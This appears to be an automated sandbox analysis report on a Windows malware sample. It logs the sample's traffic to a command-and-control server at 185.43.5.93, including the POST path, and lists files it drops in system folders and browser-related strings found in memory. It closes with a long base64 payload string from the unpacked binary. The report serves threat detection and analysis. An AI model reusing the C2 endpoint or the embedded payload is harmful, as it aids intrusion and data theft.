                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000250C000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000257B000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.5.93
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.5.93/5/4Datalife/asynccpu3Generator/
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000250C000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000257B000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000024F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phptxye
                                Source: pPTyCqA3ru.exe, 0000000C.00000002.2818393278.0000000002933000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                System Summary

                                barindex
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, s67.csLong String: Length: 97628
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeCode function: 10_2_00007FF64C401494 LocalAlloc,NtQuerySystemInformation,LocalFree,LocalAlloc,LocalFree,10_2_00007FF64C401494
                                Source: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeCode function: 10_2_00007FF64C401348 NtQuerySystemInformation,10_2_00007FF64C401348
                                Source: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeCode function: 10_2_00007FF64C401A44: CreateFileW,DeviceIoControl,CloseHandle,FindFirstVolumeW,FindFirstVolumeMountPointW,memcpy,GetVolumeNameForVolumeMountPointW,GetVolumeNameForVolumeMountPointW,GetLastError,RemoveDirectoryW,FindNextVolumeMountPointW,FindVolumeMountPointClose,FindNextVolumeW,FindVolumeClose,FindVolumeMountPointClose,FindVolumeClose,10_2_00007FF64C401A44
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Resources\Ease of Access Themes\PfjsOcNiQfAmiszo.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Resources\Ease of Access Themes\f6900929d627b7Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Prefetch\ReadyBoot\f6900929d627b7Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E38200_2_001E3820
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D03500_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D34500_2_001D3450
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F28200_2_001F2820
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001C78ED0_2_001C78ED
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001EB1200_2_001EB120
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E82000_2_001E8200
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001DFAF00_2_001DFAF0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E52E00_2_001E52E0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E9B800_2_001E9B80
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001CF3C00_2_001CF3C0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F83C20_2_001F83C2
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_002064600_2_00206460
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001EBD100_2_001EBD10
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D1D4E0_2_001D1D4E
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E55B00_2_001E55B0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001C5E500_2_001C5E50
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_00204E720_2_00204E72
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001C4E600_2_001C4E60
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001DB6D00_2_001DB6D0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E46D00_2_001E46D0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E7EF00_2_001E7EF0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_0020A7820_2_0020A782
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001E8FD00_2_001E8FD0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D6FC00_2_001D6FC0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001DEFF00_2_001DEFF0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F3FE00_2_001F3FE0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E38205_2_001E3820
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001F28205_2_001F2820
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001C78ED5_2_001C78ED
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001EB1205_2_001EB120
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E82005_2_001E8200
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001DFAF05_2_001DFAF0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E52E05_2_001E52E0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D03505_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E9B805_2_001E9B80
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001CF3C05_2_001CF3C0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001F83C25_2_001F83C2
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_002064605_2_00206460
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D34505_2_001D3450
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001EBD105_2_001EBD10
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D1D4E5_2_001D1D4E
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E55B05_2_001E55B0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001C5E505_2_001C5E50
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_00204E725_2_00204E72
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001C4E605_2_001C4E60
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001DB6D05_2_001DB6D0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E46D05_2_001E46D0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E7EF05_2_001E7EF0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_0020A7825_2_0020A782
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001E8FD05_2_001E8FD0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D6FC05_2_001D6FC0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001DEFF05_2_001DEFF0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001F3FE05_2_001F3FE0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_004023206_2_00402320
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0040CF8F6_2_0040CF8F
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_004050C06_2_004050C0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_004204706_2_00420470
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0040FCF06_2_0040FCF0
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_00419D196_2_00419D19
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0041951B6_2_0041951B
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_004156356_2_00415635
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0041DEC36_2_0041DEC3
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_00404F006_2_00404F00
                                Source: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeCode function: 10_2_00007FF64C40175410_2_00007FF64C401754
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF848F21EC312_2_00007FF848F21EC3
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF848F31D5512_2_00007FF848F31D55
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF848F908E112_2_00007FF848F908E1
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF848F31EC318_2_00007FF848F31EC3
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF848F41D5518_2_00007FF848F41D55
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF84911FC4A18_2_00007FF84911FC4A
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF84912338D18_2_00007FF84912338D
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF8491210A218_2_00007FF8491210A2
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF84911F4CD18_2_00007FF84911F4CD
                                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe 38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exe 38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                Source: Joe Sandbox ViewDropped File: C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exe 38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: String function: 001F6220 appears 84 times
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: String function: 00407D30 appears 55 times
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: String function: 001FA8B8 appears 40 times
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 268
                                Source: KyC6hVwU8Z.exeBinary or memory string: OriginalFilename vs KyC6hVwU8Z.exe
                                Source: KyC6hVwU8Z.exe, 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KyC6hVwU8Z.exe
                                Source: KyC6hVwU8Z.exe, 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMOUNTVOL.EXEj% vs KyC6hVwU8Z.exe
                                Source: KyC6hVwU8Z.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: KyC6hVwU8Z.exeStatic PE information: Section: .back ZLIB complexity 1.0003138373136389
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, s67.csBase64 encoded string: 'H4sIAAAAAAAEADSbx3KDyhKG3+VuWZDTUoicM4izIuecefqDT9V1VbsseZgZMd1//59k//PP/0RslT7//zIumkHL1M5UhNSePZHldkmVtZwh/6oUNd8yRms+zun8opaD7hguo1U+Jb3/RDfkVFduj+Upsr/fU7ns4rQedGL51ygkVr5O8Tt9zSH6PL+CRH2NNJ4ZDytyN0lwL8iBBsyN9rMwQpaZ2MkZnZABvYGx7hVsDouqRJR0pGoQg/3iQIvPMfuXgS1ejmnmYspmhMkPcjvGYAcZiKa5j4iPvCG2iWhxaPaZhhwDiltgcjf45pp9Z4AQTpIwA9p6YZRYGvJjwAficGzLt3RNea7DRa6mCT2E3h+LrHQ92b7ENrTl/HlKqioaSKLXITlnUs3rSaVn8OFPkFWvefGWRRgUb5xACgSygjyPh7aOYx21jZo379MsoDXaCVCp4EKP4MiHGvepwgyufoVpAs0PKFwUwZEtGxGXTkn1ty9nnqFPNH0LAouRkRDIfFDPa1NBrNAMY7lVTtpXY9BzDlwqMmKKJ/NEx3481/epe7sL/usBASyunQhificCYwH2fqd//cKcP8FMEAc/zyvdbMEgfNMCKkT4BxNaY/5yiY7BPDdtV37AaCfwprvpo+gHXk33fTjycEcBfBVFVXNBqigsmERpGGdpwQ/HAgWdw7cLsjsWlV+e5w5iVLw8SvZ510CKu7MNtNgD48moLM1H4Ln3Ai5oCgGJZ0CJcwvhL7AMfkg/J4QR5IbfCIWB7wFtW0oFBb3gM/keTCjgQAaCSoHgzr4LCY9jk3IAEIUr2TgApLqY2/Mxlp3I881IEws/DBM1UxzMPJqD5IMk+t1BoP4h15LL8kMYCKwOD7EoGA5es7VgOzPGwEKnD/MhR4ClRLLZkV/RlDFAU6SmoThVCCbKGkhooDtwlGESHg4RbWsG0NNDUZE5JDFIWX0RxuO47vNzNCOSDldGETRGD7wLQssFvTeEdHCFSTxi1+pUjFQMTKlqecaED1UXnHo4A41dzOBJOwRSrBpdULPtmRIUKswInfe4wZE2RdAieb7e8TWIhyQugsFCijJMMl713UQHkE/aPKXQhz3UsHieh4ZY6qfCMH3qlGkKTce8+YiGwRE+BEnjtKusxZbR6PeGKBq8KFTZixxE1LECC+cYjh3hu2KIS5Ik2qukHTFBuw+FO0XhNwm2Nkh+kfe15uE7a7rCYA7E4F4jQGyCDtuTKUZGULGB00nx/PFkQzfjY1MhD0DwXZZB1LHH4nxmc0HT8A4K2iHyOUibAbiwINKnQ3FtJOVRewSumYj6UYAsYlS2FDkBOI0doZ+RXijTFAiOozrAD3JF/rJtJP1AaIEWCycTO2IEQeEQGV+52YM+wqGrGD0jqjBxiJI3yKzDTGyiEUNGsQgCpoBGudGLKtho6Y4EKuKgBbQcRw2lQalTV6jCQrkc1YRP1lgidW5P1j359+R9R9/C2tn3ZtibTU8ZDV/y5ozrdEP+4F